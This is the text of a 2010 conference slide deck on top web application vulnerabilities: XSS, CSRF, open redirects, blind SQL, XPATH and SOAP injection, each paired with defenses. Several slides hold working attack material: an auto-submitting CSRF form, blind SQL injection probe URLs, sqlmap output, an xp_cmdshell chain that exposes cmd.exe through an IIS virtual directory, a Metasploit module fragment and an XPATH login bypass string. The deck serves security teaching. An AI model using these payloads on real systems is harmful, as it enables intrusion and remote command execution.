Web Attacks - Top threats - 2010

Session F3 Defending against the worst web-based application vulnerabilities of 2010 Date: Monday, 19 April 2010 Time: 3:45pm - 5pm Shreeraj Shah Founder and Director, Blueinfy; Author, Web 2.0 Security and Web Hacking: Attacks and Defense

Who Am I? Founder & Director Blueinfy Solutions Pvt. Ltd. (Brief) SecurityExposure.com Past experience Net Square, Chase, IBM & Foundstone Interest Web security research Published research Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc. Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc. Advisories - .Net, Java servers etc. Books (Author) Web 2.0 Security – Defending Ajax, RIA and SOA Hacking Web Services Web Hacking http://shreeraj.blogspot.com [email_address] http://www.blueinfy.com

Real Life Analysis and Cases Accessing infrastructure through LDAP injection Replicating full financial database from one Blind SQL injection Accessing other user’s banking account through Logical business flaw Client side control and hacking through CSRF and XSS Results – Full control over web applications

Technology Trends Web 2.0 – Ajax, Silverlight and Flex/Flash Web Services and SOA Cloud APIs and SaaS Browser empowering – HTML 5 and several other features Traditional stacks are evolving around frameworks

Past, Present and Future Cloud 2010 Focus

Major Overlap in Web Apps Presentation Layer Business Layer Utility Layer Data Access Authentication Communication etc . Runtime, Platform, Operating System Components Server side Components Client side Components (Browser)

Next Generation Apps Site pageflakes.com (SaaS) Web 2.0 Start page Mashup for various applications Using .NET and Ajax technologies Can access mails, news etc. from the same page Various Widgets and modules

Next Generation Architecture HTML / JS / DOM RIA (Flash) Ajax Browser Internet Blog Web 2.0 Start Database Authentication Application Infrastructure Web Services End point Internet Mails News Documents Weather Bank/Trade RSS feeds

Vulnerability distribution WASC Stats.

Client Side Vulnerabilities V1 - XSS (DOM, Mashup, Widget, RSS feeds etc.) V2 - CSRF (XML) V3 - Redirects and Forwards (Phishing and Trust break)

V1 - Distributed DOM driven XSS Web Server DB DB Web app attacker Web app Web app proxy Web Client 8008 XML/JSON/JS-Obj Stream eval() XSS

DOM Exploit Points document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… document.attachEvent(…) document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…)

Exploiting RSS feeds RSS feeds consuming un-trusted sources. Feed readers common component Vulnerable to DOM driven XSS. Malicious code injection and attaching browser.

Mashups Exploits API exposure for Mashup application. Building applications with APIs Cross Domain access by callback may cause a security breach. Extensive DOM leverage – inject and exploit

Widgets/Gadgets Exploits DOM sharing model can cause many security issues. One widget can change information on another widget – possible. CSRF injection through widget code. Event hijacking is possible – Common DOM

Defense Input validation and encoding JavaScript – source code analysis Widget – DOM sharing issue Information validation and trusted source consumption XSS protection and Cross Domain Blocking

V2 - Cross Site Request Forgery (CSRF) Next Generation CSRF Is it possible to do CSRF to XML stream How? It will be POST hitting the XML processing resources like Web Services JSON CSRF is also possible Interesting check to make against application and Web 2.0 resources

One-Way CSRF <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>' > </FORM> <script>document.buy.submit();</script> </body> </html>

Forcing XML Splitting XML stream in the form. Possible through XForms as well. Similar techniques is applicable to JSON as well.

Defense Server Side Checks Check for client’s content-type. XHR calls – xml/application. Native calls – text/html. Filtering is possible on it. Client Side Checks Stream can be started and terminated by /* or any predefined characters. Client can remove them before injecting to DOM.

V3 – Redirects and Forward issues As a part of root cause, there must be a redirect hole Example, http://foo.bank.com/login.aspx?user=xxx&page=trade.aspx Here “page” is a vulnerable parameter What if? Some one put page=http://yahoo.com …

Attack Anatomy Attacker foo.bank.com http://foo.bank.com/login.aspx?user=xxx& page=http://yahoo.com Get redirect or JavaScript call for loading yahoo.com Vulnerability detected!!! Detection

Attack Anatomy Click the link Get a redirect response to 203.88.XX.XX 1 Link in mail Threat

Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Trusted evil redirect 2

Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user Send username and password Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) 3

Attack Anatomy Bank’s user foo.bank.com Click the link Get a redirect response to 203.88.XX.XX 203.88.XX.XX (Attacker’s area) Bank’s user Send dummy form Bank’s user Send username and password Send dummy response (Thanks!) Trusted evil redirect 203.88.XX.XX (Attacker’s area) Logs in and do money transfer 4

Defense Need to validate parameters before passing to redirect calls on server side Filtering http:// or https:// Do not pass values to JavaScript redirect before filtering or validating Deployment level redirect should not rely on http parameters coming from user Checking referrer on important forms

Server Side Vulnerabilities V4 - Advanced SQL injection (Blind/XML/JSON) V5 – XPATH Injection V6 – Reverse Engineering V7 – Logical Attacks V8 – WSDL discovery V9 – SOAP faultcode leakage V10 – SOAP injections

V4 - Advanced SQL injections SQL injection over JSON streams Flash based points XML data access layer exposure Errors are not standard in 500 200 and messages are embedded in the stream

Blind SQL Injection We have SQL injection point but it is not throwing any error message out as part of its response. Application is sending customized error page which is not revealing any signature by which we can deduce potential SQL flaw. Knowing SQL injection point or loophole in web application, xp_cmdshell seems to be working. But we can’t say is it working or not since it doesn’t return any meaningful signature. This is “blind xp_cmdshell”. Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from the box to the Internet by which you can confirm execution of the command on the target system. We don’t know the actual path to webroot so can’t copy file to location which can be accessed over HTTP or HTTPS later to confirm the execution of the command. If we know path to webroot and directory structure but can’t find execute permission on it so can’t copy cmd.exe or any other binary and execute over HTTP/HTTPS.

Checks… AND 1=1 DBO check http://192.168.50.50/details.aspx?id=1+AND+USER_NAME()='dbo' Wait delay call http://192.168.50.50/details.aspx?id=1;waitfor+delay+'0:0:10' (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115 http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114 http://www.dvds4less.net/details.aspx?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),2,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=97

Running tools SQL Map or Absinthe D:\tools\sqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com> and belch <daniele.bellucci@gmail.com> [*] starting at: 18:47:58 [18:48:00] [WARNING] the remote DMBS is not MySQL [18:48:00] [WARNING] the remote DMBS is not PostgreSQL remote DBMS: Microsoft SQL Server banner: --- Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 Copyright (c) 1988-2005 Microsoft Corporation Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2) --- [*] shutting down at: 18:48:14

Exploiting Set WshShell = WScript.CreateObject("WScript.Shell") Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%") windir = ObjExec.StdOut.ReadLine() Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT") Set Dir = Root.Create("IIsWebVirtualDir", "secret") Dir.Path = windir Dir.AccessExecute = True Dir.SetInfo http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs’ … .. … .. … .. http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo >> c:\secret.vbs’ http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs’

Get the cmd.exe Run command over HTTP/HTTPS http://target/secret/system32/cmd.exe?+/c+set

Metasploit … sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $path = $self->GetVar('RPATH'); my $vhost = $self->GetVar('VHOST'); my @url = split(/#/, $path); my @payload = ("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject(\"WScript.Shell\")>c:\\secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject(\"IIS://LocalHost/W3SVC/1/ROOT\")>>c:\\secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create(\"IIsWebVirtualDir\",\"secret\")>>c:\\secret.vb s'", "EXEC+master..xp_cmdshell+'echo+Dir.Path+=+\"c:\\winnt\\system32\\\">>c:\\secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:\\secret.vbs'", "EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:\\secret.vbs'", "EXEC+master..xp_cmdshell+'cscript+c:\\secret.vbs'" ); $self->PrintLine("[+] Sending SQL injection payload..."); for(my $count=0;$count<=6;$count++) ..

V5 - XPATH injection XPATH parsing standard error XPATH is method available for XML parsing MS SQL server provides interface and one can get table content in XML format. Once this is fetched one can run XPATH queries and obtain results. What if username/password parsing done on using XPATH – XPATH injection

XPATH injection string fulltext = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false

XPATH injection string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XPATH parsing can be leveraged by passing following string ' or 1=1 or ''=‘ This will always true on the first node and user can get access as who ever is first user. Bingo!

V6 - Revere Engineering It is possible to reverse engineer RIA apps Attacking Flash and Silverlight components Identifying hidden treasure and business logic Crafting attacks based on enumerated information

V7 - Logical Attack Exploiting application layer weakness with logical issues Accessing unauthorized information Analyzing code – JavaScript analysis and logical errors Several key areas can be exploited Debugging and Reverse Engineering helps a lot

V8 - WSDL Discovery Attacks Search in the public domain Tool – Search Engines Look for wsdl,asmx,jws etc. Filetype and allinurl

V9 - Fault code leakage with SOAP Fault code of web services spit lot of information about internal workings. This attack can fetch internal paths, database interfaces etc. Fault code is part of SOAP envelope and this helps an attacker to make logical deduction about assets.

V10 – SOAP injections (SQL) SQL injection can be done using SOAP traffic. It is innovative way of identifying database interface points. One can leverage xp_cmdshell via SOAP. Back end database can be compromised using this attack.

Defending Input validations across streams – XML, JSON and Name-Value pairs Not to put logic in client side components running in Flash and Silverlight Extra attention and code review for logical attacks WSDL and SOAP security around Web Services

Key Controls WAF for stream protection Source Code Review during SDLC Developers knowledge base Secure API and Library usage across enterprise Secure SDLC with various controls including threat modeling Web 2.0 Attacks and Countermeasure strategies

CONCLUSION – QUESTIONS! [email_address] http://www.blueinfy.com

Web Attacks - Top threats - 2010

More Related Content

What's hot (20)

Viewers also liked (12)

Similar to Web Attacks - Top threats - 2010 (20)

More from Shreeraj Shah (8)

Web Attacks - Top threats - 2010

Editor's Notes